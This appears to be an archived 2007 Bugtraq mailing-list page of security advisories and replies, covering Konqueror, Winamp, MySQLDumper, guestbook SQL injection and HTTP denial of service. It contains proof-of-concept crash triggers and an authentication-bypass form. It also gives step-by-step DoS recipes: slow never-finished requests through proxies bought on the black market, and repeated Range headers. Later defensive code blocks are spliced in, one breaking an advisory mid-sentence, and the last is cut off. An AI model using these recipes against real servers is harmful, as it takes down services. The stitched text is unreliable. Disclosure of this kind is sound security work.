Re: Re: [BuHa-Security] Winamp 5.35 (Infinite) M3U File Inclusion DoS Vulnerability

2007-08-01 Thread bugtraq
Hi 3APA3A,

3APA3A wrote:
 Can you, please explain why is this security bug?

I think you mistake my posting. I did not want to say that this issue is a 
(real) *security* vulnerability but I definitely would call it a DoS bug. 

 DoS is not software crash, DoS is Denial of Service. It means,
 security impact of DoS vulnerability should be preventing (blocking)
 access of legitimate user to some data or service (via data
 corruption, service malfuction, etc).

It seems we have a different understanding of the term Denial Of Service. In 
my opinion your explanation exactly matches this issue. As you said DoS is the 
attempt to make a (computer) resource unavailable to its user via data 
corruption etc. Here Winamp is the computer resource and the M3U file is the 
corrupted data. Sure the user can easily recover from this DoS by restarting 
the audio player and to be exact the M3U file is not a great example for 
corrupted data but I would still call this issue a DoS bug. 

How would you name it? Winamp 5.35 (Infinite) M3U File Inclusion Stack 
Overflow Exception? 

Best regards,
Thomas Waldegger


[BuHa-Security] DoS Vulnerability in Konqueror 3.5.7

2007-08-01 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

 ---
| BuHa Security-Advisory #16|Aug 01st, 2007 |
 ---
| Vendor   | KDE's Konqueror|
| URL  | http://www.konqueror.org/  |
| Version  | = 3.5.7   |
| Risk | Low (Denial Of Service)|
 ---

o Description:
=

Konqueror is the file manager for the K Desktop Environment and an
Open Source web browser with HTML 4.01 compliance.

Visit http://www.konqueror.org/ for detailed information.

o Denial of Service:
===

Following HTML code forces Konqueror to crash:
 textarea/button/textarea/brbdo dir=
 preframeset
 a

Online-demo:
http://morph3us.org/security/pen-testing/konqueror/1178292626-khtml.html

 (gdb) set args konqueror.html
 (gdb) r
 Starting program: /usr/bin/konqueror konqueror.html
 (no debugging symbols found)
 [...]
 [Thread debugging using libthread_db enabled]
 [New Thread -1234381104 (LWP 5982)]
 (no debugging symbols found)
 [...]
 Qt: gdb: -nograb added to command-line options.
  Use the -dograb option to enforce grabbing.
 X Error: BadDevice, invalid or uninitialized input device 169
   Major opcode:  145
   Minor opcode:  3
   Resource id:  0x0
 Failed to open device
 X Error: BadDevice, invalid or uninitialized input device 169
   Major opcode:  145
   Minor opcode:  3
   Resource id:  0x0
 Failed to open device
 (no debugging symbols found)
 [...]

 Program received signal SIGSEGV, Segmentation fault.
 [Switching to Thread -1234381104 (LWP 5982)]
 0xb5ef84e7 in ?? () from /usr/lib/libkhtml.so.

I sent a mail to KDE's security mailing list [1] and received an answer
from Dirk Mueller several days later. He wrote that the HTML code triggers
an assert and when commenting out the assert the backtrace ends in:

 #6 0xb7bb37a4 in khtml::RenderFlow::lastLineBox (this=0x0)
 at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/render_flow.h:65
 #7 0xb7c850df in khtml::RenderBlock::createLineBoxes (this=0x821ab08,
 obj=0x0)
 at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/bidi.cpp:624

This issue does not seem to be exploitable.

o Disclosure Timeline:
=

03 May 07 - DoS vulnerability discovered.
07 May 07 - Vendor contacted.
10 May 07 - Vendor confirmed vulnerability.
01 Aug 07 - Public release.

o Solution:
==

There is no solution yet. I assume the KDE developers will address this
bug in an upcoming KDE release.

o Credits:
=

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.

Greets fly out to cyrus-tc, destructor, echox, Killsystem, nait, Neon,
Rodnox, trappy and all members of BuHa.

Advisory online:
http://morph3us.org/advisories/20070801-konqueror-3.57.txt

[1] http://www.kde.org/info/security/

- --
Don't you feel the power of CSS Layouts?
BuHa-Security Community: https://buha.info/board/



[BuHa-Security] Winamp 5.35 (Infinite) M3U File Inclusion DoS Vulnerability

2007-07-31 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

 ---
| BuHa Security-Advisory #15|Jul 30th, 2007 |
 ---
| Vendor   | Nullsoft's Winamp (Lite)   |
| URL  | http://www.winamp.com/ |
| Version  | = 5.35|
| Risk | Low (Denial Of Service)|
 ---

o Description:
=

Winamp is a proprietary media player for Windows systems. Visit
http://www.winamp.com/ for detailed information.

o Denial Of Service:
===

The M3U file format allows including local and remote files by
simply specifying the path to the desired file. Furthermore Winamp does
not check if the M3U file to include is the currently processed M3U
file, wherefore it's possible to force Winamp to recursively read a
certain M3U file. Winamp allocates memory on each iteration, which
leads to a stack overflow exception (0xc00000fd).

You are able to simply test this bug yourself by creating a file named
'a.m3u' with the content 'a.m3u'. If you are using the standard version
of Winamp (not the Lite version) you just have to add the M3U file to
Winamp by for example simply dragging the file into the playlist.

The lite version catches the exception and exits if you add the
malformed M3U file to the playlist. If you use the Enqueue in Winamp
option (if configured you'll find it in the context menu) Winamp Lite
does not catch the exception and crashes too.

It's also possible to add a remote file to the playlist by clicking
on Add - Add URL and inserting a URL like:
http://morph3us.org/security/pen-testing/winamp/a.m3u

These are the register values and the ASM dump at the time of the stack
overflow exception:
 eax=0d64 ebx=025b ecx=00032b90 edx=7c91eb94 esi=
 edi=000381c0 eip=0045ffe5 esp=00036b88 ebp=00036b90

 Function: winamp
 0045ffba cc   int 3
 0045ffbb cc   int 3
 0045ffbc cc   int 3
 0045ffbd cc   int 3
 0045ffbe cc   int 3
 0045ffbf cc   int 3
 0045ffc0 3d0010   cmp eax,0x1000
 0045ffc5 730e jnb winamp+0x5ffd5 (0045ffd5)
 0045ffc7 f7d8 neg eax
 0045ffc9 03c4 add eax,esp
 0045ffcb 83c004   add eax,0x4
 0045ffce 8500 test[eax],eax
 0045ffd0 94   xchgeax,esp
 0045ffd1 8b00 mov eax,[eax]
 0045ffd3 50   pusheax
 0045ffd4 c3   ret
 0045ffd5 51   pushecx
 0045ffd6 8d4c2408 lea ecx,[esp+0x8]
 0045ffda 81e90010 sub ecx,0x1000
 0045ffe0 2d0010   sub eax,0x1000
 FAULT -0045ffe5 8501 test[ecx],eax
   ds:0023:00032b90=
 0045ffe7 3d0010   cmp eax,0x1000
 0045ffec 73ec jnb winamp+0x5ffda (0045ffda)
 0045ffee 2bc8 sub ecx,eax
 0045fff0 8bc4 mov eax,esp
 0045fff2 8501 test[ecx],eax
 0045fff4 8be1 mov esp,ecx
 0045fff6 8b08 mov ecx,[eax]
 0045fff8 8b4004   mov eax,[eax+0x4]
 0045fffb 50   pusheax
 0045fffc c3   ret
 0045fffd cc   int 3
 0045fffe cc   int 3
 0045 cc   int 3
 0046 80f940   cmp cl,0x40
 00460003 7316 jnb winamp+0x6001b (0046001b)
 00460005 80f920   cmp cl,0x20
 00460008 7306 jnb winamp+0x60010 (00460010)
 0046000a 0fadd0   shrdeax,edx,cl
 0046000d d3fa sar edx,cl
 0046000f c3   ret

This bug does not seem to be exploitable.

o Disclosure Timeline:
=

xx Jan 07 - Vulnerability discovered.
14 Apr 07 - Vendor contacted.
30 Jul 07 - Public release.

o Solution:
==

There is no solution yet.

I sent a mail to [EMAIL PROTECTED] (I did not find a better contact
address) on April the 14th but did not receive an answer until now.

o Credits:
=

Thanks to destructor who originally spotted the bug and nait who analysed
the vulnerability.

Christian Deneke (nait) [EMAIL PROTECTED]
http://www.deneke.biz/

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that
some mails 
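Added example, not Winamp code: a playlist loader that does what the advisory says Winamp does not do, namely check whether a nested M3U entry is already being processed. It expands nested playlists from an in-memory file set (constructed; 'a.m3u' containing only 'a.m3u' is the advisory's trigger), reports cycles instead of recursing into them, and caps nesting depth for long acyclic chains.

```python
"""Expand nested M3U playlists with cycle detection and a depth cap."""
import posixpath

MAX_DEPTH = 8  # constructed limit; deeper chains are reported, not followed


def expand_m3u(files: dict, name: str, _path=None, _depth=0):
    """Return (tracks, problems) for playlist `name`.

    `files` maps a normalised path to the text of that playlist and stands in
    for the filesystem.  Entries ending in .m3u are expanded in place; every
    other entry is treated as a track and copied through unchanged.
    """
    path = _path or []          # playlists currently being expanded (the stack)
    name = posixpath.normpath(name)
    if name in path:            # the entry names a playlist already on the stack
        return [], [f"cycle: {' -> '.join(path + [name])}"]
    if _depth > MAX_DEPTH:
        return [], [f"depth limit reached at {name}"]
    if name not in files:
        return [], [f"missing playlist: {name}"]

    tracks, problems = [], []
    base = posixpath.dirname(name)
    for raw in files[name].splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):   # blank, #EXTM3U or #EXTINF lines
            continue
        # Remote URLs are kept as-is; local entries resolve relative to the list.
        entry = line if "://" in line else posixpath.normpath(posixpath.join(base, line))
        if entry.lower().endswith(".m3u"):
            sub_tracks, sub_problems = expand_m3u(files, entry, path + [name], _depth + 1)
            tracks.extend(sub_tracks)
            problems.extend(sub_problems)
        else:
            tracks.append(entry)
    return tracks, problems


# Constructed sample set: a.m3u is the advisory's self-including case,
# b.m3u and c.m3u include each other, d.m3u is a normal list that pulls in b.
SAMPLE_FILES = {
    "a.m3u": "a.m3u\n",
    "b.m3u": "#EXTM3U\nsong1.mp3\nc.m3u\n",
    "c.m3u": "song2.mp3\nb.m3u\n",
    "d.m3u": "#EXTM3U\nintro.mp3\nb.m3u\n",
}


if __name__ == "__main__":
    for start in ("a.m3u", "d.m3u"):
        tracks, problems = expand_m3u(SAMPLE_FILES, start)
        print(start, "->", tracks, problems)
```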

Re: [Full-disclosure] Mozilla protocol abuse

2007-07-25 Thread bugtraq
Does anyone know of a full list of Protocol handlers on the major browsers in a 
central location?

- Robert
http://www.cgisecurity.com/ Application Security news and more.

 
 The Mozilla application platform currently has an unpatched input 
 validation flaw which allows you to specify arbitrary command line 
 arguments to any registered URL protocol handler process. Jesper 
 Johansson already detailed parts of this on his blog on July 20, 
 http://msinfluentials.com/blogs/jesper/. I wrote a vulnerability report 
 on July 18 together with a proof-of-concept exploit that targeted 
 Thunderbird 2.0.0.4.
 
 Thunderbird 2.0.0.5 was released on July 19 and incidentally fixed this 
 specific attack vector through its osint command line flag. It is now 
 6 days later and people should have had time to update their Thunderbird 
 installations, so I have decided to publish my vulnerability report 
 together with the exploits as they detail how to handle XPI exploitation.
 
 The HTML version can be found at
 
 http://larholm.com/2007/07/25/mozilla-protocol-abuse/
 
 A ZIP file with the report and the XPI exploits can be found at
 
 http://larholm.com/media/2007/7/mozillaprotocolabuse.zip 
 
 
 Cheers
 Thor Larholm
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
 



MySQLDumper vulnerability: Bypassing Apache based access control possible

2007-07-03 Thread bugtraq
A critical security issue has been found in the Open Source PHP backup
tool MySQLDumper [0]. The issue allows bypassing an Apache based access
control created with MySQLDumper. Through this an attacker can easily gain
full control over all features of MySQLDumper.

The authors of MySQLDumper were informed about the problem on June 12,
2007 via email. In a reply we received on June 24, 2007, one author stated
that he does not agree that there is a security issue. Because we don't
have the impression that the authors are going to fix this issue and
inform the public about the hole, we decided to publish this issue.

The issue was found by Henning Pingel and Lars Houmark.

 About MySQLDumper 

The main purpose of MySQLDumper is to create full backups of large MySQL
databases from a web interface without the need for shell access. It
also allows administering MySQL databases.

To ensure that only authenticated users have access to an instance of
MySQLDumper the tool offers a built-in feature to create a pair of
.htaccess and .htpasswd files to password protect the directory in which
the tool has been installed on Apache web servers. This feature is
documented in a tutorial [2].

 Affected versions 

Every currently available version of mysqldumper listed on [1] has this hole:

- MySQLDumper 1.23_pre_release_REV227
- MySQLDumper 1.22
- MySQLDumper 1.21b
- MySQLDumper Typo3-Extension 0.0.5

 Description of the security issue 

Inside of the generated .htaccess file the Apache directive LIMIT is used.
The parameters used within the LIMIT directive are not sufficient, so the
folder protection is not reliable. In the PHP file main.php at line 52
(the line number depends on the version of the tool; please search for "limit
get") the content of the file .htaccess is created. The interesting part is this
section:

  <Limit GET>

The problem is that this means that the password protection is only valid
for HTTP GET requests, but not for other request types like HTTP POST
requests. For further information on the directive LIMIT please have a
look at the Apache documentation [3,4].

To say it more clearly: If one requests a file inside of the protected
MySQLDumper folder, one is not asked for user and password if you use a
POST request to request the file. That means the whole .htaccess/.htpasswd
protection is useless.

 Proof of concept 

<html><body>
<form action="http://localhost/mysqldumper1.23/main.php" method="post">
   <input type="submit" value="main">
</form>
</body></html>

In the same way it is possible to execute the functionality of MySQLDumper
to delete .htaccess and .htpasswd file via a POST request.

 First aid for users of MySQLDumper 

1) Delete MySQLDumper folder from web space if it is installed in a
guessable path or
2) Correct the content of .htaccess / .htpasswd files to make them reliable.

 Related links 

[0] http://www.mysqldumper.de
[1] http://www.mysqldumper.de/board/downloads.php?cat=2
[2] http://www.mysqldumper.de/tuts/de/htaccess/msd_htaccess.html
[3] http://httpd.apache.org/docs/1.3/mod/core.html#limit
[4] http://httpd.apache.org/docs/2.0/mod/core.html#limit
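Added example, not MySQLDumper code: a small audit of an .htaccess for the mistake described above. In Apache a `<Limit GET>` block applies its directives to GET (and HEAD) only, so `Require` inside it leaves POST unauthenticated; the corrected file drops the wrapper so `Require valid-user` applies to every method. Both .htaccess texts are constructed for the example, the `AuthUserFile` path included.

```python
"""Find authentication directives that are scoped to a <Limit> block."""
import re

# Constructed: the shape of the weak file, with Require wrapped in <Limit GET>.
WEAK_HTACCESS = """\
AuthType Basic
AuthName "MySQLDumper"
AuthUserFile /var/www/mysqldumper/.htpasswd
<Limit GET>
    Require valid-user
</Limit>
"""

# Constructed: the same file with the wrapper removed, so Require is
# unconditional and POST, PUT, DELETE and arbitrary methods all need a login.
FIXED_HTACCESS = """\
AuthType Basic
AuthName "MySQLDumper"
AuthUserFile /var/www/mysqldumper/.htpasswd
Require valid-user
"""

_OPEN = re.compile(r"^\s*<(Limit|LimitExcept)\s+([^>]*)>\s*$", re.IGNORECASE)
_CLOSE = re.compile(r"^\s*</(Limit|LimitExcept)>\s*$", re.IGNORECASE)
_AUTH = re.compile(r"^\s*(Require|Auth\w*)\b", re.IGNORECASE)


def audit_htaccess(text: str):
    """Return one finding per auth directive inside a <Limit>/<LimitExcept> block.

    An empty list means every Require/Auth* directive applies to all methods.
    """
    findings = []
    block = None  # (directive, [methods]) of the enclosing block, if any
    for line_no, line in enumerate(text.splitlines(), 1):
        m = _OPEN.match(line)
        if m:
            block = (m.group(1).lower(), m.group(2).split())
            continue
        if _CLOSE.match(line):
            block = None
            continue
        if block and _AUTH.match(line):
            directive, methods = block
            listed = ", ".join(methods)
            if directive == "limit":
                note = f"applies only to {listed}; other methods bypass it"
            else:
                note = f"does not apply to {listed}; those methods bypass it"
            findings.append(f"line {line_no}: '{line.strip()}' {note}")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_HTACCESS), ("fixed", FIXED_HTACCESS)):
        print(label, audit_htaccess(text) or "OK: auth applies to all methods")
```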


[tool] Etherbat - Ethernet topology discovery

2007-05-30 Thread bugtraq
Hello,

I would like to announce Etherbat, a tool for Ethernet topology discovery
which I presented at the Confidence 2007 conference in Krakow, Poland.
Etherbat performs topology discovery between 3 hosts: the local machine
and two other devices.
It could be useful for an administrator tracking an intruder, an auditor 
performing a security audit or an attacker trying to find out more about the 
network structure.
Etherbat could be described as a layer 2 equivalent of traceroute. Neither
managed switches nor extra software on remote hosts is required.

Etherbat is released under GPLv2 license.

Etherbat homepage:
http://etherbat.cryptonix.org

--
Pawel Pokrywka
https://secure.cryptonix.org


Re: Your Opinion

2007-03-16 Thread bugtraq
I think an issue is that if they are providing an OS and charging for it, that 
it should have these security features
by default. The user shouldn't have to pay additional money to ensure the 
initial product they purchased
is secure. Not to mention of course certain vendors are going to start seeing a 
drop in business for certain products. I wonder
will this turn out like the IE/Netscape browser wars a few years ago?

Regards,
- Robert Auger
http://www.cgisecurity.com/ Application Security news and More
http://www.webappsec.org/
http://www.qasec.com/


 I have heard the comment "It's a huge conflict of interest for one company 
 to provide both an operating platform and a security platform" made by John 
 Thompson (CEO Symantec) many times from many different people.  See article 
 below.
 
 http://www2.csoonline.com/blog_view.html?CID=32554
 
 In my personal opinion, regardless of the vendor, if they create an OS, why 
 would it be a conflict of interest for them to want to protect their own OS 
 from attack.  One would assume that this is a responsible approach by the 
 vendor, but one could also argue that their OS should be coded securely in 
 the first place.  If this were to happen then the need for the Symantec's, 
 McAfee's of the world would somewhat diminish.
 
 Anyway I am just curious as to what other people think.
 
 Thanks in advance
 
 Mark 
 



LI-Guestbook SQL Injection Vulnerability

2007-03-05 Thread bugtraq
New Advisory:
LI-Guestbook SQL Injection Vulnerability
http://belsec.com/advisories/139/summary.html

Summary
Belsec ID: BS0001
Vendor: LI-Scripts
Vendor's Web Site: http://www.liscripts.net
Software: LI-Guestbook
Software's Web Site: http://www.liscripts.net/products.php#guestbook
Versions: 1.1
Critical Level: Moderate
Type: SQL Injection
Class: Remote
Status: Unpatched
PoC/Exploit: Not Available
Solution: Not Available
Discovered by: Belsec Team

-Description---
1. SQL Injection.

Vulnerable script: guestbook.php

Parameter 'country' is not properly sanitized before being used in SQL
query. This can be used to make SQL queries by injecting arbitrary SQL
code.

Condition: magic_quotes_gpc = off

--PoC/Exploit--
Waiting for developer(s) reply.

--Solution-
No Patch available.

--Credit---
Discovered by: Belsec Team


Regards,
Belsec Team
http://belsec.com



Sava's GuestBook Multiple Vulnerabilities

2007-03-05 Thread bugtraq
New Advisory:
Sava's GuestBook Multiple Vulnerabilities
http://belsec.com/advisories/142/summary.html

Summary
Belsec ID: BS0002
Software: Sava's GuestBook
Software's Web Site: http://savasplace.com
Versions: 23.11.2006
Critical Level: Moderate
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched
PoC/Exploit: Not Available
Solution: Not Available
Discovered by: Belsec Team

-Description---
1. SQL Injection.

Vulnerable script: add2.php

Parameters 'name', 'country', 'email', 'website' and 'message' are not
properly sanitized before being used in SQL queries. This can be used to
make SQL queries by injecting arbitrary SQL code.

Condition: magic_quotes_gpc = off


2. Cross-Site Scripting.

Vulnerable Script: add2.php

Parameters 'name', 'country', 'email' and 'website' are not properly sanitized.
This can be used to post arbitrary HTML or web script code.

--PoC/Exploit--
Waiting for developer(s) reply.

--Solution-
No Patch available.

--Credit---
Discovered by: Belsec Team


Regards,
Belsec Team
http://belsec.com



Announcement: The Cross-site Request Forgery FAQ

2007-01-16 Thread bugtraq
 The Cross-site Request Forgery FAQ has been released to address some of the 
common 
 questions and misconceptions regarding this commonly misunderstood web flaw.   
  
 URL: The Cross-site Request Forgery FAQ 
 http://www.cgisecurity.com/articles/csrf-faq.shtml 
  
  
 Regards, 
  
 - Robert 
 [EMAIL PROTECTED] 
 http://www.cgisecurity.com/ 
 http://www.qasec.com/ 
 http://www.webappsec.org/ 
 


Re: Ipswitch WS_FTP 2007 Professional wsftpurl access violation vulnerability

2007-01-16 Thread HACKPL - bugtraq/sapheal

So it could be remotely
exploitable after all.

On the other hand, most people don't tell their browsers to open up a
separate application to handle ftp:// links.



I agree. It could be exploited in the aforementioned way(but: WS_FTP is not 
registered to handle FTP protocol by default). Now I am thinking of 
something else. Could we use a specially crafted FHF file to exploit the 
vulnerability? I haven't checked that yet.


Michal Bucko (sapheal) 



Re (3): Circumventing CSFR Form Token Defense

2007-01-12 Thread bugtraq
Sorry, this was worded in a very bad way, as my whole reply:

When writing my first message I wanted to express I could not test this with 
IE: I simply thought IE would not offer the possibility to render pages in 
objects. This is obviously wrong, although there seems to be a bug in IE (try 
it yourself: http://phihag.de/security/ie_iterate_freeze/ ) causing my 
experiments to fail. Upon rewriting the text too late (like now ;) ) tested 
with became the final, totally senseless version I posted. I just tested it, 
it seems there is entirely no way to even address an object's contents if it is 
in the same domain (at least when it's embedded as the standard says). 

Just a little thought: Is there any possibility to fire up a text-reading 
ActiveX-Control (IE itself, some XML parsing modules?) in an object and read 
the content from outside?

(BTW: This would be primarily an UXSS but not a CSFR attack, as the whole 
scenario I described in the first message)


Re: [Full-disclosure] Web Honeynet Project: announcement,

2007-01-12 Thread bugtraq
The Web Application Security Consortium is also doing such a project at
http://www.webappsec.org/projects/honeypots/ . May be worthwhile to share data 
perhaps?

- zeno
http://www.cgisecurity.com/ Web Application Security news, and more
http://www.cgisecurity.com/index.rss [Security RSS Feed]


 
 [ Warning: this email message includes links to live web server malware
 propagated this Wednesday via file inclusions exploits. These links are
 not safe! ]
 
 Hello.
 
 The newly formed Web Honeynet Project from SecuriTeam and the ISOTF will
 in the next few months announce research on real-world web server attacks
 which infect web servers with:
 Tools, connect-back shells, bots, downloaders, malware, etc. which are all
 cross-platform (for web servers) and currently exploited in the wild.
 
 The Web Honeynet Project will, for now, not deal with the regular SQL
 injection and XSS attacks every web security expert loves so much, but
 just with malware and code execution attacks on web servers and hosting
 farms.
 
 These attacks form botnets constructed from web servers (mainly IIS and
 Apache on Linux and Windows servers) and transform hosting farms/colos to
 attack platforms.
 
 Most of these tools are being injected by (mainly) file inclusion
 attacks against (mainly) PHP web applications, as is well known and
 established.
 
 PHP (or scripting) shells, etc. have been known for a while, as well as
 file inclusion (or RFI) attacks, however, mostly as something secondary
 and not much (if any - save for some blogs and a few mailing list posts a
 year ago) attention was given to the subject other than to the
 vulnerabilities themselves.
 
 The bad guys currently exploit, create botnets and deface in a massive
 fashion and force ISPs and colos to combat an impossible situation where
 any (mainly) PHP application from any user can exploit entire server
 farms, and where the web vulnerability serves as a remote exploit to be
 followed by a local code execution one, or as a direct one.
 
 What is new here is the scale, and the fact we now start engaging the bad
 guys on this front (which so far, they have been unchallenged on) -
 meaning aside for research, the Web Honeynet Project will also release
 actionable data on offensive IP addresses, URLs and on the tools
 themselves to be made available to operational folks, so that they can
 mitigate the threat.
 
 It's long overdue that we start the escalation war with web server
 attackers, much like we did with spam and botnets, etc. years ago. Several
 folks (and quite loudly - me) have been warning about this for a while,
 now it's time to take action instead of talk. :)
 
 Note: Below you can find sample statistics on some of the Web Honeynet
 Project information for this last Wednesday, on file inclusion attacks
 seeding malware.
 You will likely notice most of these have been taken care of by now.
 
 The first research on the subject (after looking into several hundred such
 tools) will be made public in the February edition of the Virus Bulletin
 magazine, from:
 Kfir Damari, Noam Rathaus and Gadi Evron (yours truly).
 
 The SecuriTeam and ISOTF Web Honeynet Project would like to thank
 Beyond Security ( http://www.beyondsecurity.com ) for all the support.
 
 Special thanks (so far) to: Ryan Carter, Randy Vaughn and the rest of the
 new members of the project.
 
 For more information on the Web Honeynet Project feel free to contact me.
 
 Also, thanks for yet others who helped me form this research and
 operations hybrid project (you know who you are).
 
   Gadi.
 
 Sample report and statistics (for Wednesday the 10th of January, 2007):
 

Re: a cheesy Apache / IIS DoS vuln (+a question)

2007-01-10 Thread bugtraq
On Tue, Jan 09, 2007 at 12:15:02AM -0600, William A. Rowe, Jr. wrote:
 
 bugtraq wrote:
  
  a quick fix for this can be available at least on bsd, there is accf_http 
  that can be modified not to pass the connection to apache until a full 
  request
  is read (either get or post, full, not just the first get request header, 
  of course this can be even worst for a lot of post data).
 
 For what it is worth, Apache 2.2.x and later introduce support for http 
 accept()
 filtering on platforms which support httpfilter.  Since Apache 2.0.x, AcceptEx
 is supported on Win32 to pend accept() for at least the initial request 
 payload.
 
 Of course this is not without some resource utilization for the incomplete
 request payloads, but at least it does offload the resources from the web
 server itself to the kernel socket layer.

1. apache does support socket level filtering but u must have the right code 
for every kind of attack. e.g. a default http accept filter on (free)bsd will 
just wait for the_request header. after that the web server will face the same 
problem. only delayed. of course that filter should be seen more like an example
2. you get to fight again when sending the data - attacker wouldn't close the 
socket, but will slow down the read filling netbufs on server side 
3. you have no chance to identify the bots without learning traffic patterns 
before ... 

offtopic, you can even use tor network - until one point (which?) those *are* 
legit requests and tor network is slow enough to simplify the schedulers on 
attacker side :)
and i don't know how easy it can be to prove attacker's guilt at the *real* value

not saying this is a big problem for everyone, but for most of the people it is 
and antiddos business sharks just waitin' for the occasion to eat you more 
painfully and prolly faster than attacker :P


 
 Bill

-- 
adrian ilarion ciobanu (cia)


Re: Circumventing CSFR Form Token Defense

2007-01-10 Thread bugtraq
If there is a method which enables JavaScript to set up arbitrary HTTP requests 
and read the server's answers, you could implement an autonomic browser which 
requests any pages (using the user's cookies to authenticate) and saves them 
somehow to an internal string. From then, there's no barrier for transmitting 
this data to the attacker's server. Alternatively, the script may perform all 
the work the attacker wants it to (download all gmail messages...) and send 
this to the attacker. Therefore I agree that any tokens do not add security.

Testing (only with IE, Firefox, Opera and Konqueror so far) I found no way to 
circumvent the restrictions on *reading* requested pages from JS - setting 
up the request works, but attempts to read the document (embedded in a 
frame/object*/iframe) failed with some access denied exception (FF, Opera: 
exception, Konqueror: undefined values, IE: strange errors) when domain names 
do not match. (So the potential of the attack is still there - think eBay 
and their JS policy - but limited to sites allowing users to write JS - || 
browsers not taking extensive precautions in handling JS between frames/objects)

XMLHttpRequest et al are limited in the same way.

So "The javascript makes a simple HTTP/S request to the form (...)" turns out 
to be the critical problem. Any ideas how to set up and somehow read an HTTP 
request to another server in JavaScript?

*except IE


QASEC Announcement: Writing Software Security Test Cases

2007-01-08 Thread bugtraq
I've just released an article about how the Quality Assurance phase of the 
development cycle can incorporate security testing into a standard test plan, 
and make it part of the regular testing cycle.

Writing Software Security Test Cases: Putting security test cases into your 
test plan
http://www.qasec.com/cycle/securitytestcases.shtml


- Robert
[EMAIL PROTECTED]
http://www.cgisecurity.com/
http://www.qasec.com/


Re: a cheesy Apache / IIS DoS vuln (+a question)

2007-01-08 Thread bugtraq

to kill is enough not to finish the request and let it timeout on server side.
no ddos/dos protection layers can stand against this attack (as far as i know) 
and the scenario is simple 
1. fingerprint the timeout on serverside
2. dig the sitemap from target
3. build a list of browsers to advertise to server during request
4. buy proxies from black market 
5. start requests thru proxies to target
requests are never to be finished. randomized headers, following the sitemap. 
send few bytes, wait something less than server timeout and send the next few 
bytes, never finish the request. at least apache will wait for the request to 
finish. with 2k proxies starting 3-4 requests (browsers sending parallel 
requests, target should allow more than one request) u can generate a contiguous 
flow of 6k to 8k requests to apache. starvation will start sooner, apache will 
just consume its resources waiting for bogus requests to finish, he will never 
read a full request but will just timeout waiting for data. the thing is you 
can make the wait process longer, because (at least in some implementation, i 
think i tested 1.3.x and 2.0.x), you send first few bytes then put apache in 
wait, he will start his timer but when u send the next few bytes after X seconds 
he will reset his timer for that request. slow, sure-thing death.

with a default timeout of 300 seconds on server side and request headers having 
lets say 512 bytes of data, sending max rand(5,10) bytes before timeout comes 
in u will keep a thread busy for at least 300*50 seconds with one single 
request ... discard connection when request is sent and just start a new one, 
u don't have to consume bw by reading response

a quick fix for this can be available at least on bsd, there is accf_http that 
can be modified not to pass the connection to apache until a full request is 
read (either get or post, full, not just the first get request header, of course 
this can be even worse for a lot of post data). prolly there are ddos middle 
layers that can do the thing but i did not find one yet. at least the big guys 
on the market seem to be vulnerable.
you can't find patterns to stop this kind of attack cuz you simulate a real 
browser 100%, all u can do is to readahead the request and filter bogus before 
apache does. 99% of apache setups come with default config, never modified 
by owner. thinking cpanel, at least. its not about consuming srv bw, its just 
about making it choke and its happening very fast.



On Thu, Jan 04, 2007 at 12:27:11AM +0100, Michal Zalewski wrote:
 I feel silly for reporting this, but I couldn't help but notice that
 Apache and IIS both have a bizarro implementation of HTTP/1.1 Range
 header functionality (as defined by RFC 2616). Their implementations allow
 the same fragment of a file to be requested an arbitrary number of times,
 and each redundant part to be received separately in a separate
 multipart/byteranges envelope.
 
 Combined with the functionality of window scaling (as per RFC 1323), it is
 my impression that a lone, short request can be used to trick the server
 into firing gigabytes of bogus data into the void, regardless of the
 server file size, connection count, or keep-alive request number limits
 implemented by the administrator. Whoops?
 
 Since there are easier tools to (D)DoS a service, and since nothing about
 this attack is particularly innovative, I'll just describe what's on my
 mind... let's say that http://example.com/foo.html is a medium-size static
 file we found on the server (something on the order of 300 kB for Apache
 and 150 kB for IIS is optimal). An attack would then look roughly the
 following way:
 
   1) Connect to the server (as many times as allowed by the remote party
  or deemed appropriate for the purpose of this demonstration),
 
   2) Negotiate a high TCP window size for each of the connections (1 GB
  should be doable),
 
   3) Send a partial request as follows for each of the connections:
  GET /foo.html HTTP/1.1
  Host: example.com
  Range: bytes=0-,0-,0-,0-,0-... (up to 8 kB for Apache, 16 kB for IIS)
 
  Each 0- would generate a separate multipart/byteranges containing
  the entire file (bytes from 0 'til EOF).
 
   4) Send a closing newline within each of the connections to commit
  the request,
 
   5) Silently drop the connections, possibly re-connect to dial-up / DSL
  to duck the responses that would keep pouring at full speed until
  TCP window size is exhausted or an ISP-level non-delivery /
  congestion control mechanism kicks in (and isn't filtered out
  down the route).
 
 This should cause the server to send gigabytes of data, with only a
 minimal bandwidth expense on the attacker's end.
 
 Well, that's the story.
 
 This isn't the only fire-and-run-away attack that seems to be made much
 more feasible with the help of window scaling (by making it more tempting
 for the attacker to request tons of data and then go off-line 
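The Range header trick quoted above (one `0-` per copy of the file) is straightforward for a server to refuse. As an added example, not code from either post nor from Apache or IIS, the check below parses a `Range` value per RFC 2616, counts the bytes the server would emit if it honoured every range literally, and rejects repeated or overlapping ranges; the limit of 32 ranges per request is a policy value chosen for this example.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum range_verdict { RANGE_OK, RANGE_MALFORMED, RANGE_TOO_MANY, RANGE_OVERLAP };

#define MAX_RANGES 32   /* policy knob chosen for this example */

struct byte_range { uint64_t first, last; };   /* inclusive, as in RFC 2616 */

/* Parse one byte-range-spec ("A-B", "A-", "-N") for a file of file_size bytes.
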